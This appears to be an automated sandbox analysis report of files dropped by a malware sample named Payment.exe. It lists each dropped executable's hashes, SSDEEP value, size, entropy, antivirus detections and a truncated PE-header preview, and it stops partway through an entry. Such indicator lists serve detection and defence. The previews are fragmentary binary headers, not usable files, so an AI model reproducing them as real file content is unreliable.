                                                                                                                                                                                                                                                                                                                                          MD5:DE211EFFCAB1891C991DAC1D852CC9CB
                                                                                                                                                                                                                                                                                                                                          SHA1:16513974E7EB65757AA8DE9390EE2CBA27184E27
                                                                                                                                                                                                                                                                                                                                          SHA-256:AF19CD15C0682C2592B79C02AAFB76D660D0CE9AF83C11F7BFA7ECA2345239B9
                                                                                                                                                                                                                                                                                                                                          SHA-512:F31DA278D646A023B8F3440C2792B0D809D3C90BC5D39716996678615887866CF7576420F4F5570D1AF192D60AB9D1804CD947C40841E954A5D1D987726F9F2D
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc... ...........<..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1658880
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.313003744288918
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:WxGBcmlZVg9N9JMlDlfjRiVuVsWt5MJMs:uGy+jgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:F5BCBACCEA71830B4ADA5AACE7DD6009
                                                                                                                                                                                                                                                                                                                                          SHA1:26DC56616B63CB3A5535386D599FEE62C786E0F5
                                                                                                                                                                                                                                                                                                                                          SHA-256:86C108B5F79609590966DF29369DA13D359FB06640C96469739876778BA9A6B0
                                                                                                                                                                                                                                                                                                                                          SHA-512:58EB3CC5015FDD60E1D523651452BD2104146D675C4824C31EC1665B350C272DA3606B0B510AACC953ED58CEB1F6B9948878A93BF364DB8F48B71B2D562E5403
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................$9......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):2013184
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.862719255395332
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:v0vHykLj8trn3wsHVg9N9JMlDlfjRiVuVsWt5MJMs:qHj4rgs1gFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:9F671E3EE0B79BB62E0926BEAECBA602
                                                                                                                                                                                                                                                                                                                                          SHA1:210B128D74FD22D2B54A3A4DA2ACD3356B973A5A
                                                                                                                                                                                                                                                                                                                                          SHA-256:B06FD8249E5B4616D64FD3549B94D2CF4481166064CC4B19CEF7280A460DBCD4
                                                                                                                                                                                                                                                                                                                                          SHA-512:3938A6C487ABD03B44B808F348FC944D5657B5C1E8C577949495A83C31E34EF9BEF426EC6D0AAE02B582CD50CAB50D8770B33A21FFA1CD90E37556F5A0894222
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..................................K......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc...0....... ..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.278449995347671
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:H4i0wGJra0uAUfkVy7/ZOgFIDRRAubt5M:HN0wGJrakUQy1Uf
                                                                                                                                                                                                                                                                                                                                          MD5:7215C048CA1D40130706C73C21401CA1
                                                                                                                                                                                                                                                                                                                                          SHA1:10195D66C0F3556B1753366655BC70A586C1023F
                                                                                                                                                                                                                                                                                                                                          SHA-256:AC7B0CB9BCB1F646394DC2627769800638803F3E1A70F10DE2420AAE44363FBE
                                                                                                                                                                                                                                                                                                                                          SHA-512:62768024580643428989AD26B718A6EEC0D8A554F275A9416F3A8F1E8B5158EC2F8D7CCF57B9D2BC6211CBB6B5F68846A68B2E536029E0FB7D985F30678FA44F
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.447821142203832
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:UeR0gB6axoCf0R6RLQRF/TzJqe58BimFVg9N9JMlDlfjRiVuVsWt5MJMs:ggHxmR6uBTzge5MimfgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:5D7B0BEC6D8D546407F1B7F01CBBD2BE
                                                                                                                                                                                                                                                                                                                                          SHA1:6777788057F55677C559BBAC0B3A3A2AF756C368
                                                                                                                                                                                                                                                                                                                                          SHA-256:ECE834E33FC4CFCB15C063FAFFB918348A3BB5B3A8DF57EADAD06CE4DCFE0E5A
                                                                                                                                                                                                                                                                                                                                          SHA-512:E275C5911F818E0348C50A6E749B359BD6C8E535881A50F5FDC56AA0DD57F48630356DBE81D2CE1E9B9A6245F4A9B14C504E5421DFB28E2AD45D1B5FBCA9844F
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`....../.......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1743872
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.508040806610014
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:uKwOtO7XVg9N9JMlDlfjRiVuVsWt5MJMs:uzOtmFgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:B1D2B0072D72EBC434D21501E915B8FB
                                                                                                                                                                                                                                                                                                                                          SHA1:40265D90F46AB096217E5C544EB5F1D2D3002614
                                                                                                                                                                                                                                                                                                                                          SHA-256:6F2F45E112E28BD50E10D0CDA5AA295B531D69100ADE9A0D964507C02633A4C7
                                                                                                                                                                                                                                                                                                                                          SHA-512:BF151CE97F8983CC379FFD494427A8D63F7D3921C9B5041D883F7E70F836DF74907AA82CCC314465CF7263159B4FFC5A7BB2C938DBD734724D6B87A398F33A7F
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................................................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1743872
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50868016807321
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:SZU/h/4KkVg9N9JMlDlfjRiVuVsWt5MJMs:SG/VkgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:5001126C3400D8825AD6ECAB13167EEB
                                                                                                                                                                                                                                                                                                                                          SHA1:9953D030FFC67D4101092F449F376D0E758645D0
                                                                                                                                                                                                                                                                                                                                          SHA-256:A9D572B01FA8A27F0CCE70F59D928F8AAB9FD45268EBA5CD72685C2A9BD18021
                                                                                                                                                                                                                                                                                                                                          SHA-512:D6B230CBFEE41A39099D7919DD26DACF56A039DF22F44B34075CE6F717005F7A1E1FC97CF0217E5323D5900F047946A6F4F8CB08BCE02B714FEE1EDED9F9AD8B
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@.................................I........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1882624
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.614349905118474
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:0x73iBLZ05jNTmJWEx7Vg9N9JMlDlfjRiVuVsWt5MJMs:0xDiHIjNgpgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:5809D5DC34585842A01FAB0B61F656ED
                                                                                                                                                                                                                                                                                                                                          SHA1:97AB08FAEB585C685D7550281C3ED7BEFAFEA226
                                                                                                                                                                                                                                                                                                                                          SHA-256:BE5BA2D926CB50541B9901F4F4044A37C3A39250E399D7F88F852E5CB6800080
                                                                                                                                                                                                                                                                                                                                          SHA-512:28921DCBE26A763B8BFC54A9CEB66B52BDE7C9FC32D96F063AC4640AE73026EB0F4EEE85FBC530307397832D7AD2A0FDE6A4E3C6DCB828D84E22D327F22EF909
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..........................@......#...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):6313984
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.933942374741138
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:196608:qd/eb1j56ibMMsA8YzOIWwa8NZp79k6e6pVxSUf:qd/eb1j0i41YzOu3NZp7O6e6pV8Uf
                                                                                                                                                                                                                                                                                                                                          MD5:BCB01B519F651F3402CBE86483789595
                                                                                                                                                                                                                                                                                                                                          SHA1:5B7B9FFA3B6B3B330ADFB48E0576BD475529E49C
                                                                                                                                                                                                                                                                                                                                          SHA-256:9CC134C262B9E6DD7F8AAFE67ADC660ADB8D0E1BB7C9B2848338E0FEE27B7B6F
                                                                                                                                                                                                                                                                                                                                          SHA-512:A9611F3FB9F22013431BA3BB7A602F7AFD309C4015B44CE91F2653316CE01C5D2F6E9CC8DE94F0E12CB1BEC6C3FD777F468FF625E796A20DF5B5BFE05EC8E6E7
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...1X.g..........".......@..P.......k#...........@...........................b......,a.............................{.J.P....J.......M.............................-J......................*J......A@.............$.J......J.@....................text....-@.......@................. ..`.rdata..P....@@......2@.............@..@.data....^....J.......J.............@....tls....y....PM.......K.............@...CPADinfo(....`M.......K.............@...malloc_h.....pM.......K............. ..`.rsrc........M.......K.............@..@.reloc....... W.......U.............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1526784
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.0498654035126425
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:81V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:83Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:4FCF1F044F417FB2186DD8019990BCFD
                                                                                                                                                                                                                                                                                                                                          SHA1:FA15B74B1AAD7421E87E92FF1C3AA447EAE2C08D
                                                                                                                                                                                                                                                                                                                                          SHA-256:925F4918A7FCBBC4EC086FE766E8FB4BE9BF574CC1D73557B4C148C1760781F2
                                                                                                                                                                                                                                                                                                                                          SHA-512:2C578A51F7B5A9A932AD2FF97D5578D14DF0C39F73D08CB16B0BD0A98ADA5CE487E98C4E53CC7FA4DBF8B15423C6DCCF2CDD6B8B3A7E6A6F6DA602161AF884D7
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................F.......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...............l..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009212759497924
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:SMuV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:5OVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:B912A468EBD14E7A11242907B47533D4
                                                                                                                                                                                                                                                                                                                                          SHA1:63659933DFBABFEAB6C5DDEEF81A3BE02EF54A9A
                                                                                                                                                                                                                                                                                                                                          SHA-256:6FB983E94BE117F85948793E04B8FBDEFF171B8B76DBE8D3165AC412427E5230
                                                                                                                                                                                                                                                                                                                                          SHA-512:52AAFE3BC15E1D886449AD15651EBFD5EF6D012A91F6A70DD190EC525618DF63048975AA0D6DAAA32173FC28C1E9434628371036A06602FBF218BE0EE96E85DC
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@..............................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1743872
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.508048485279185
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:7KwOtO7XVg9N9JMlDlfjRiVuVsWt5MJMs:7zOtmFgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:DC000539382A3D24E2E7F055C97F1DAE
                                                                                                                                                                                                                                                                                                                                          SHA1:C125E10645D0B7A204F48861DE6062D41AC96425
                                                                                                                                                                                                                                                                                                                                          SHA-256:CD6F05BD557740AF386CE9943CB0FC7A5C1A2B1298BABFC7DDB04FD4B19223B4
                                                                                                                                                                                                                                                                                                                                          SHA-512:6B9C20A91F2066504B575D64FE2D53C0982BB7DE059DF009E5A01C7A48ECDFF74F2E551CD48A51195DEFD0D706AA2877D19B58D7C117C693B8497C9E6A07B84E
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@.................................3........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1581056
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1306546943289835
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:QY1vvCV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:P16Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:DC3FB50F6BD80D0EEF8C83803E909507
                                                                                                                                                                                                                                                                                                                                          SHA1:F55C32760D7F2E9F237CEBCDEFC422C869529DDE
                                                                                                                                                                                                                                                                                                                                          SHA-256:5E5CD35202ADE73B720DA23C78EA3F521EAB0122BE79ABE3DF996A06B9D1201A
                                                                                                                                                                                                                                                                                                                                          SHA-512:57F02AF90C0E67960E0ADDB4A77B46D814DBB207408ADB9AF29429C462AF7B7965A72E5688DC525A1E119854C28A30126907380F616963EA2FD54EA9C6621E87
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..........................`..............................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc.......p.......@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1743872
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50867561586425
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:kZU/h/4KkVg9N9JMlDlfjRiVuVsWt5MJMs:kG/VkgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:549239814725C37CA9DE3B635AD22D50
                                                                                                                                                                                                                                                                                                                                          SHA1:5A2FE662C10847BA875D19983950275E8D49BCBC
                                                                                                                                                                                                                                                                                                                                          SHA-256:D7DA762008611BBDEE142B0E54CD5770A45CF642C765BD648F6562E28079922A
                                                                                                                                                                                                                                                                                                                                          SHA-512:630CA84B562FD1A3D8A45F842DD468E7B22FCF4030DC353D7EED6768032B905FFC9E2EE044EBCF0F6036F03AEB74327F95DC0BCB19ABEC8BBE39FEBAE2470AC3
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................................................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1882624
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.61434500466364
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:Tx73iBLZ05jNTmJWEx7Vg9N9JMlDlfjRiVuVsWt5MJMs:TxDiHIjNgpgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:6BDE89ED84768A711DF7D2E67E38C9C1
                                                                                                                                                                                                                                                                                                                                          SHA1:255C265394B09C9291AEA0B7A4A1EFDFF64F3C57
                                                                                                                                                                                                                                                                                                                                          SHA-256:8DB25A66A2C4BBDCEF97BAEB5A40DF069710116509611F7364D6E873AE821F12
                                                                                                                                                                                                                                                                                                                                          SHA-512:3F9D1B7BC1D20B724513447604C0E57DE67204DD4D3BC4032F6EB1A89717D8CCC1BFC8B62BCEED1E407CFAE6DBF97DEDED77095236E253B175166688AB5664DB
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..........................@.......a..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1510912
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.009600095246035
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:gRreV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:a6Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:F43485135336EA926199E99D442F4E74
                                                                                                                                                                                                                                                                                                                                          SHA1:CF2F5A6F5F74C51B6AF1498D45E64C8B16035683
